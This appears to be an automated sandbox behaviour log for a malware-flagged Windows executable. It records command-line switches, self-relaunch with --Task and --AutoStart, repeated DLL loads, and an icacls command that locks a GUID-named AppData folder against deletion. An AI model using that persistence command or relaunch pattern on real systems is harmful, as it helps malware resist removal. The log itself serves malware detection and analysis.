Source: C:\Users\user\Desktop\file.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --Task	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --AutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --Service	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: X1P	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: runas	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: x2Q	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: x*P	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: C:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: D:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: 7P	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: %username%	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: F:\	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --ForNetRes	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --Task	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --AutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --Service	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: X1P	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: runas	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: x2Q	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: x*P	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: C:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: D:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: 7P	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: %username%	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: F:\	1_2_00419F90

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	Virustotal: Detection: 80%
Source: file.exe	ReversingLabs: Detection: 100%

Source: file.exe	String found in binary or memory: set-addPolicy
Source: file.exe	String found in binary or memory: id-cmc-addExtensions
Source: file.exe	String found in binary or memory: set-addPolicy
Source: file.exe	String found in binary or memory: id-cmc-addExtensions
Source: file.exe	String found in binary or memory: set-addPolicy
Source: file.exe	String found in binary or memory: id-cmc-addExtensions
Source: file.exe	String found in binary or memory: set-addPolicy
Source: file.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe --Task
Source: unknown	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe --Task
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe --Task	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: ntlanman.dll
